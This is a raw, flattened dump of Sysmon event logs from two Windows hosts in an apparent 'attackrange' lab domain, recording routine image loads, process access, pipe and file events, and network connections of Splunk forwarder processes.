(rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605865Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605864Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 
(rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605863Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001605862Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605861Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605860Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605859Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605858Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x80000000000000001605857Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 
10341000x80000000000000001605856Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605855Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.090{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{21761711-842A-607D-9700-00000000BB01}3716C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605854Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605853Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605852Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605851Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605850Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605849Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 10341000x80000000000000001094924Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:17:33.471{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094923Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:33.471{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605967Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:34.858{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605966Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:34.858{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F83C540EC4CAC4C901429024927097D3,SHA256=CF37DD3FDD6C3437228F29B86B11FBFE65BD8652CA939378DDA26D8BF0E5191Efalsefalse - insufficient disk space 23542300x80000000000000001094928Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:34.678{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B756710243794AD52FD45A96F3EADE0F,SHA256=20289EC037D93E44CF6DE3E5F48F9389699B55D46F8D006178A56AA7CF94CFB7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001605965Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.685{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49720-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001605964Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:34.092{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605963Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:34.092{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACE9D394B4C8527BEF516651DE12E7F6,SHA256=3031D3DA31185005BB2F4EEF8E1B7D228032922A8EB4A44808CFAF46A6002974falsefalse - insufficient disk space 
10341000x80000000000000001094927Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:34.472{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094926Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:34.472{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605969Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:35.861{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605968Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:35.861{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB813F6C19C3767ABA7C477C1EAB0470,SHA256=A4EA8A364BFA4C513C5EEE88C12664387F7D751ABAF83DFF3203F61607359A3Dfalsefalse - insufficient disk space 23542300x80000000000000001094933Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.686{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B3B73C3A9AF9BCB37AAD2825CBB2341,SHA256=F25DF7938EF152131C8FD027D680AE5F1DA4BEEC7F80E88443568736652CEC35,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001094932Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:30.706{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1137-false10.0.1.12-8000- 10341000x80000000000000001094931Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.472{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001094930Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.472{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094929Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.122{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5B1A25712B9678FAE93F4C54A5F5B8B,SHA256=6C6B18A257C75FE485341FC795A6BDCF5A88CC31E5652715223468047F5FEB9A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605971Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:36.868{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605970Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:36.868{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EF9DAEA26B1BE33BB833499D86E65D6,SHA256=856288DEC29374BA7D2C1A128D346D14D32F9829032D44298FB40FFA9A1916F3falsefalse - insufficient disk space 23542300x80000000000000001094936Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:36.690{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7F67505D06BDFE6A0033046F1D81A87,SHA256=58050955FD8963CCEEB5C781EFC44C0049C863D2131D5D419C73FE7EDAD03FC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001094935Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:36.473{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094934Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:17:36.473{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605973Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:37.870{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605972Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:37.870{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F692B3F0957BD14AE8E89F9AAC853201,SHA256=59BABD3ECDD5C20B9ACBE5BFDCF04EFA10FBA6BAC325CB5830AE221193C8B1F9falsefalse - insufficient disk space 23542300x80000000000000001094939Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:37.693{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47C80FB30ED882C2E31710F0894E5807,SHA256=58AEC1DFA9B01C738253E364EB095CF8D9946F919D3D3D47A32DAAFBEEC8062F,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001094938Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:37.473{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094937Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:37.473{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
11241100x80000000000000001605975Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:38.888{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001605974Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:38.888{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7358BC6087B7E117B660235113CB1700,SHA256=296DA985FB3BC98C75E883B208CEEEEA7F672441AA75AF2EFBF9BB3D6A6B1E2Bfalsefalse - insufficient disk space
23542300x80000000000000001094942Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:38.705{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A55E9E2794FB8E5F73C105C7F71B11,SHA256=C0C29715654C763BD2D90F33755FA034FC595D6E4A67A519F41E5BFBC950DAF0,IMPHASH=00000000000000000000000000000000falsetrue
10341000x80000000000000001094941Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:38.474{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
